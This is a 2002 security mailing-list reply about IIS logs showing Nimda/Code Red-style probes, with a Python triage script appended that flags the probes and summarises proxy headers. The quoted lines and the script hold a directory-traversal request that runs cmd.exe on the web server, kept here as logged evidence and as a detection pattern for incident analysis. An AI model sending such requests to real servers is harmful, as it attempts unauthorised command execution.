On Wed, Jun 26, 2002 at 10:18:36AM -0400, Maxime Ducharme wrote:
> 2002-06-26 09:14:15 212.179.220.111 - 192.168.100.2 80 GET
> /winnt/system32/cmd.exe /c+dir+c:\ 404 2526 206 0 HTTP/1.1
> 65.94.25.135 - - -
> 2002-06-26 09:14:15 212.179.220.111 - 192.168.100.2 80 GET
> /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 404 2526 209 0 HTTP/1.1
> 65.94.25.135 - - -
>
> Sent packet show :
>
> GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\ c:\ HTTP/1.1
> Host: 65.94.25.135
> Connection: keep-alive
> Accept: */*
> X-Forwarded-For: 212.179.220.111
> Via: 1.1 proxy2 (NetCache NetApp/5.2.1R1D3)
>
> The proxy is relaying itself ? not much sense
> The worm generated header on-the-fly ?

The NetCache proxy server is a hardware-based proxy server from NetApp which usually runs in transparent mode. Thus also proxying nimda/codered runs.

--
Cliff Albert | RIPE: CA3348-RIPE | http://oisec.net/
cliffat_private | 6BONE: CA2-6BONE |

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
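Added example, not part of the original message: a small Python triage of the two log entries and the captured request quoted above, flagging the cmd.exe probes after URL-decoding and summarising the proxy evidence (Via, X-Forwarded-For) next to the logged client IP. The field order of the log lines is an assumption inferred from the quoted entries, and the function names are hypothetical.

```python
from urllib.parse import unquote

# Constructed from the post: the two IIS log entries and the captured
# request, with the mail line-wrapping undone.
LOG = r"""2002-06-26 09:14:15 212.179.220.111 - 192.168.100.2 80 GET /winnt/system32/cmd.exe /c+dir+c:\ 404 2526 206 0 HTTP/1.1 65.94.25.135 - - -
2002-06-26 09:14:15 212.179.220.111 - 192.168.100.2 80 GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe /c+dir+c:\ 404 2526 209 0 HTTP/1.1 65.94.25.135 - - -"""
REQUEST = r"""GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir+c:\ c:\ HTTP/1.1
Host: 65.94.25.135
Connection: keep-alive
Accept: */*
X-Forwarded-For: 212.179.220.111
Via: 1.1 proxy2 (NetCache NetApp/5.2.1R1D3)"""

def classify(uri):
    """Decode the path once, then flag cmd.exe requests and ../ traversal."""
    path = unquote(uri.split("?", 1)[0]).lower()
    return {"probe": path.endswith("/cmd.exe"), "traversal": "/../" in path}

def parse_log(line):
    # Assumed field order (inferred from the quoted lines): date time c-ip
    # cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status ...
    f = line.split()
    return {"c_ip": f[2], "stem": f[7], "query": f[8], "status": f[9],
            **classify(f[7])}

def parse_request(raw):
    """Return (request target, headers with lower-cased names)."""
    head, *lines = raw.splitlines()
    headers = {}
    for l in lines:
        name, _, value = l.partition(":")
        headers[name.strip().lower()] = value.strip()
    return head.split(" ")[1], headers

def relay_info(c_ip, headers):
    """Summarise proxy evidence. X-Forwarded-For is an unverified claim
    unless the proxy that added it is one you trust."""
    xff = [h.strip() for h in headers.get("x-forwarded-for", "").split(",")
           if h.strip()]
    return {"relayed": "via" in headers, "proxy": headers.get("via"),
            "claimed_origin": xff[0] if xff else None,
            "origin_equals_c_ip": bool(xff) and xff[0] == c_ip}

if __name__ == "__main__":
    entries = [parse_log(l) for l in LOG.splitlines()]
    target, headers = parse_request(REQUEST)
    for e in entries:
        print(e)
    print(target, relay_info(entries[1]["c_ip"], headers))
```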
This archive was generated by hypermail 2b30 : Thu Jun 27 2002 - 10:02:30 PDT